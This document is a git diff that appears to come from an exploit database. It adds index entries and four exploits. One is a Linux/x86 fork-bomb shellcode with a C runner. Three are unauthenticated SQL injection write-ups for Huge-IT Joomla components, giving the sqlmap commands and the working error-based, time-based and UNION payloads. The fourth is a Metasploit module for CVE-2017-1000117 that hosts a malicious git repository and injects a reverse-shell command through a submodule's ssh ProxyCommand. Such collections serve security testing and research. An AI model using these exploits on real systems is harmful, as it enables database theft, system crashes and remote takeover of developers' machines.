diff --git a/files.csv b/files.csv index f24719077..3c009ea68 100644 --- a/files.csv +++ b/files.csv @@ -15783,6 +15783,7 @@ id,file,description,date,author,platform,type,port 42558,platforms/windows/remote/42558.py,"Disk Savvy Enterprise 9.9.14 - Buffer Overflow (SEH)",2017-08-25,"Nipun Jaswal",windows,remote,0 42559,platforms/windows/remote/42559.py,"Sync Breeze Enterprise 9.9.16 - Buffer Overflow (SEH)",2017-08-25,"Nipun Jaswal",windows,remote,0 42560,platforms/windows/remote/42560.py,"Disk Pulse Enterprise 9.9.16 - Buffer Overflow (SEH)",2017-08-25,"Nipun Jaswal",windows,remote,0 +42599,platforms/python/remote/42599.rb,"Git <= 2.7.5 - Command Injection (Metasploit)",2017-08-31,Metasploit,python,remote,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 @@ -16428,6 +16429,7 @@ id,file,description,date,author,platform,type,port 42485,platforms/lin_x86-64/shellcode/42485.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.2:4444/TCP) Shellcode (153 bytes)",2017-08-17,"Touhid M.Shaikh",lin_x86-64,shellcode,0 42522,platforms/lin_x86-64/shellcode/42522.c,"Linux/x86_64 - Kill All Processes Shellcode (19 bytes)",2017-08-19,"Touhid M.Shaikh",lin_x86-64,shellcode,0 42523,platforms/lin_x86-64/shellcode/42523.c,"Linux/x86_64 - Fork Bomb Shellcode (11 bytes)",2017-08-19,"Touhid M.Shaikh",lin_x86-64,shellcode,0 +42594,platforms/lin_x86/shellcode/42594.c,"Linux/x86 - Fork Bomb Shellcode (9 bytes)",2017-08-30,"Touhid M.Shaikh",lin_x86,shellcode,0 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0 @@ -38377,3 +38379,6 @@ id,file,description,date,author,platform,type,port 42590,platforms/php/webapps/42590.txt,"Joomla! Component Joomanager 2.0.0 - Arbitrary File Download",2017-08-30,"Ihsan Sencan",php,webapps,0 42591,platforms/php/webapps/42591.txt,"iBall Baton 150M Wireless Router - Authentication Bypass",2017-03-07,Indrajith.A.N,php,webapps,0 42592,platforms/php/webapps/42592.html,"Invoice Manager 3.1 - Cross-Site Request Forgery (Add Admin)",2017-08-30,"Ali BawazeEer",php,webapps,0 +42596,platforms/php/webapps/42596.txt,"Joomla Component Huge-IT Video Gallery 1.0.9 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0 +42597,platforms/php/webapps/42597.txt,"Joomla Component Huge-IT Portfolio Gallery Plugin 1.0.6 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0 +42598,platforms/php/webapps/42598.txt,"Joomla Component Huge-IT Portfolio Gallery Plugin 1.0.7 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0 diff --git a/platforms/lin_x86/shellcode/42594.c b/platforms/lin_x86/shellcode/42594.c new file mode 100755 index 000000000..bcaa3ff36 --- /dev/null +++ b/platforms/lin_x86/shellcode/42594.c @@ -0,0 +1,59 @@ +/* +;Title: Linux/x86 - Fork() Bomb Shellcode +; Author: Touhid M.Shaikh +; Contact: https://github.com/touhidshaikh +; Category: Shellcode +; Architecture: Linux x86 +; Description: This shellcode may crash ur system if executed in ur sys. +Length: 9 bytes + + +===COMPILATION AND EXECUTION=== + +#nasm -f elf32 shell.asm -o shell.o <=== Making Object File + +#ld -m elf_i386 shell.o -o shell <=== Making Binary File + +#./bin2shell.sh shell <== xtract hex code from the binary( +https://github.com/touhidshaikh/bin2shell) + + + +=================SHELLCODE(INTEL FORMAT)================= + +section .text + +global _start + +_start: + +xor eax,eax +add eax,2 +int 0x80 +jmp _start + +===================END HERE============================ + +Compile with gcc with some options. + +# gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing + +*/ + +#include +#include + + +unsigned char code[] = \ +"\x31\xc0\x83\xc0\x02\xcd\x80\xeb\xf7"; + +main() +{ + +printf("Shellcode Length: %d\n", (int)strlen(code)); + +int (*ret)() = (int(*)())code; + +ret(); + +} diff --git a/platforms/php/webapps/42596.txt b/platforms/php/webapps/42596.txt new file mode 100755 index 000000000..084af7eb3 --- /dev/null +++ b/platforms/php/webapps/42596.txt @@ -0,0 +1,36 @@ +# Exploit Title Unauthenticated SQL Injection in Huge-IT Video Gallery v1.0.9 for Joomla +# Google Dork: [if applicable] +# Date: 2016-09-15 +# Exploit Author: Larry W. Cashdollar, @_larry0 +# Vendor Homepage: http://huge-it.com/joomla-video-gallery/ +# Software Link: +# Version: 1.0.9 +# Tested on: Linux +# CVE : CVE-2016-1000123 +# Advisory: http://www.vapidlabs.com/advisory.php?v=169 +# Exploit: + • $ sqlmap -u 'http://server/components/com_videogallerylite/ajax_url.php' --data="page=1&galleryid=*&task=load_videos_content&perpage=20&linkbutton=2" + • . + • . + • . + • (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] + • sqlmap identified the following injection point(s) with a total of 2870 HTTP(s) requests: + • --- + • Parameter: #1* ((custom) POST) + • Type: error-based + • Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR) + • Payload: page=1&galleryid=-3390 OR 1 GROUP BY CONCAT(0x716b766271,(SELECT (CASE WHEN (2575=2575) THEN 1 ELSE 0 END)),0x7170767071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&task=load_videos_content&perpage=20&linkbutton=2 + • + • Type: AND/OR time-based blind + • Title: MySQL >= 5.0.12 time-based blind - Parameter replace + • Payload: page=1&galleryid=(CASE WHEN (5952=5952) THEN SLEEP(5) ELSE 5952 END)&task=load_videos_content&perpage=20&linkbutton=2 + • --- + • [19:36:55] [INFO] the back-end DBMS is MySQL + • web server operating system: Linux Debian 8.0 (jessie) + • web application technology: Apache 2.4.10 + • back-end DBMS: MySQL >= 5.0.12 + • [19:36:55] [WARNING] HTTP error codes detected during run: + • 500 (Internal Server Error) - 2714 times + • [19:36:55] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.4' + • + • [*] shutting down at 19:36:55 \ No newline at end of file diff --git a/platforms/php/webapps/42597.txt b/platforms/php/webapps/42597.txt new file mode 100755 index 000000000..b5a3a280a --- /dev/null +++ b/platforms/php/webapps/42597.txt @@ -0,0 +1,34 @@ +# Exploit Title Unauthenticated SQL Injection in Huge-IT Portfolio Gallery Plugin v1.0.6 +# Date: 2016-09-16 +# Exploit Author: Larry W. Cashdollar, @_larry0 +# Vendor Homepage: http://huge-it.com/joomla-portfolio-gallery/ +# Software Link: +# Version: 1.0.6 +# Tested on: Linux +# CVE : CVE-2016-1000124 +# Advisory: http://www.vapidlabs.com/advisory.php?v=170 +# Exploit: + • $ sqlmap -u 'http://example.com/components/com_portfoliogallery/ajax_url.php' --data="page=1&galleryid=*&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2" + • + • + • (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] + • sqlmap identified the following injection point(s) with a total of 2870 HTTP(s) requests: + • --- + • Parameter: #1* ((custom) POST) + • Type: error-based + • Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR) + • Payload: page=1&galleryid=-2264 OR 1 GROUP BY CONCAT(0x71716a7a71,(SELECT (CASE WHEN (3883=3883) THEN 1 ELSE 0 END)),0x7178627071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2 + • + • Type: AND/OR time-based blind + • Title: MySQL >= 5.0.12 time-based blind - Parameter replace + • Payload: page=1&galleryid=(CASE WHEN (9445=9445) THEN SLEEP(5) ELSE 9445 END)&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2 + • --- + • [13:30:39] [INFO] the back-end DBMS is MySQL + • web server operating system: Linux Debian 8.0 (jessie) + • web application technology: Apache 2.4.10 + • back-end DBMS: MySQL >= 5.0.12 + • [13:30:39] [WARNING] HTTP error codes detected during run: + • 500 (Internal Server Error) - 2715 times + • [13:30:39] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.4' + • + • [*] shutting down at 13:30:39 \ No newline at end of file diff --git a/platforms/php/webapps/42598.txt b/platforms/php/webapps/42598.txt new file mode 100755 index 000000000..8bc8de868 --- /dev/null +++ b/platforms/php/webapps/42598.txt @@ -0,0 +1,36 @@ +# Exploit Title Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7 for Joomla +# Date: 2016-09-16 +# Exploit Author: Larry W. Cashdollar, @_larry0 +# Vendor Homepage: http://huge-it.com/joomla-catalog/ +# Software Link: +# Version: 1.0.7 +# Tested on: Linux +# CVE : CVE-2016-1000125 +# Advisory: http://www.vapidlabs.com/advisory.php?v=171 +# Exploit: + • $ sqlmap -u 'http://example.com/components/com_catalog/ajax_url.php' --data="prod_page=1&post=load_more_elements_into_catalog&catalog_id=*&old_count=*&count_into_page=*&show_thumbs=*&show_description=*&parmalink=*" + • + • Parameter: #1* ((custom) POST) + • Type: error-based + • Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR) + • Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=-2369 OR 1 GROUP BY CONCAT(0x717a627871,(SELECT (CASE WHEN (1973=1973) THEN 1 ELSE 0 END)),0x716b787671,FLOOR(RAND(0)*2)) HAVING MIN(0)#&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink= + • + • Type: AND/OR time-based blind + • Title: MySQL >= 5.0.12 time-based blind - Parameter replace + • Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=(CASE WHEN (7371=7371) THEN SLEEP(5) ELSE 7371 END)&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink= + • + • Type: UNION query + • Title: Generic UNION query (random number) - 15 columns + • Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=-5943 UNION ALL SELECT 2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,CONCAT(0x717a627871,0x494a475477424c724f6f7853556d61597544576f4b614d6e41596771595253476c4251797a685974,0x716b787671)-- FvOy&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink= + • --- + • [16:48:10] [INFO] the back-end DBMS is MySQL + • web server operating system: Linux Debian 8.0 (jessie) + • web application technology: Apache 2.4.10 + • back-end DBMS: MySQL >= 5.0.12 + • [16:48:10] [WARNING] HTTP error codes detected during run: + • 500 (Internal Server Error) - 6637 times + • [16:48:10] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com' + • + • [*] shutting down at 16:48:10 + + diff --git a/platforms/python/remote/42599.rb b/platforms/python/remote/42599.rb new file mode 100755 index 000000000..609aaed98 --- /dev/null +++ b/platforms/python/remote/42599.rb @@ -0,0 +1,200 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpServer + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Malicious Git HTTP Server For CVE-2017-1000117', + 'Description' => %q( + This module exploits CVE-2017-1000117, which affects Git + version 2.7.5 and lower. A submodule of the form 'ssh://' can be passed + parameters from the username incorrectly. This can be used to inject + commands to the operating system when the submodule is cloned. + + This module creates a fake git repository which contains a submodule + containing the vulnerability. The vulnerability is triggered when the + submodules are initialised. + ), + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2017-1000117'], + ['URL', 'http://seclists.org/oss-sec/2017/q3/280' ] + ], + 'DisclosureDate' => 'Aug 10 2017', + 'Targets' => + [ + [ + 'Automatic', + { + 'Platform' => [ 'unix' ], + 'Arch' => ARCH_CMD, + 'Payload' => + { + 'Compat' => + { + 'PayloadType' => 'python' + } + } + } + ] + ], + 'DefaultOptions' => + { + 'Payload' => 'cmd/unix/reverse_python' + }, + 'DefaultTarget' => 0 + ) + ) + + register_options( + [ + OptString.new('GIT_URI', [false, 'The URI to use as the malicious Git instance (empty for random)', '']), + OptString.new('GIT_SUBMODULE', [false, 'The path to use as the malicious git submodule (empty for random)', '']) + ] + ) + end + + def setup + @repo_data = { + git: { files: {} } + } + setup_git + super + end + + def setup_git + # URI must start with a / + unless git_uri && git_uri =~ /^\// + fail_with(Failure::BadConfig, 'GIT_URI must start with a /') + end + + payload_cmd = payload.encoded + " &" + payload_cmd = Rex::Text.to_hex(payload_cmd, '%') + + submodule_path = datastore['GIT_SUBMODULE'] + if submodule_path.blank? + submodule_path = Rex::Text.rand_text_alpha(rand(8) + 2).downcase + end + + gitmodules = "[submodule \"#{submodule_path}\"] +path = #{submodule_path} +url = ssh://-oProxyCommand=#{payload_cmd}/ +" + sha1, content = build_object('blob', gitmodules) + @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content + + tree = "100644 .gitmodules\0#{[sha1].pack('H*')}" + tree += "160000 #{submodule_path}\0#{[sha1].pack('H*')}" + sha1, content = build_object('tree', tree) + @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content + + ## build the supposed commit that dropped this file, which has a random user/company + email = Rex::Text.rand_mail_address + first, last, company = email.scan(/([^\.]+)\.([^\.]+)@(.*)$/).flatten + full_name = "#{first.capitalize} #{last.capitalize}" + tstamp = Time.now.to_i + author_time = rand(tstamp) + commit_time = rand(author_time) + tz_off = rand(10) + commit = "author #{full_name} <#{email}> #{author_time} -0#{tz_off}00\n" \ + "committer #{full_name} <#{email}> #{commit_time} -0#{tz_off}00\n" \ + "\n" \ + "Initial commit to open git repository for #{company}!\n" + + sha1, content = build_object('commit', "tree #{sha1}\n#{commit}") + @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content + @repo_data[:git][:files]['/HEAD'] = "ref: refs/heads/master\n" + @repo_data[:git][:files]['/info/refs'] = "#{sha1}\trefs/heads/master\n" + end + + # Build's a Git object + def build_object(type, content) + # taken from http://schacon.github.io/gitbook/7_how_git_stores_objects.html + header = "#{type} #{content.size}\0" + store = header + content + [Digest::SHA1.hexdigest(store), Zlib::Deflate.deflate(store)] + end + + # Returns the Git object path name that a file with the provided SHA1 will reside in + def get_path(sha1) + sha1[0...2] + '/' + sha1[2..40] + end + + def exploit + super + end + + def primer + # add the git and mercurial URIs as necessary + hardcoded_uripath(git_uri) + print_status("Malicious Git URI is #{URI.parse(get_uri).merge(git_uri)}") + end + + # handles routing any request to the mock git, mercurial or simple HTML as necessary + def on_request_uri(cli, req) + # if the URI is one of our repositories and the user-agent is that of git/mercurial + # send back the appropriate data, otherwise just show the HTML version + user_agent = req.headers['User-Agent'] + if user_agent && user_agent =~ /^git\// && req.uri.start_with?(git_uri) + do_git(cli, req) + return + end + + do_html(cli, req) + end + + # simulates a Git HTTP server + def do_git(cli, req) + # determine if the requested file is something we know how to serve from our + # fake repository and send it if so + req_file = URI.parse(req.uri).path.gsub(/^#{git_uri}/, '') + if @repo_data[:git][:files].key?(req_file) + vprint_status("Sending Git #{req_file}") + send_response(cli, @repo_data[:git][:files][req_file]) + else + vprint_status("Git #{req_file} doesn't exist") + send_not_found(cli) + end + end + + # simulates an HTTP server with simple HTML content that lists the fake + # repositories available for cloning + def do_html(cli, _req) + resp = create_response + resp.body = < + Public Repositories + +

Here are our public repositories:

+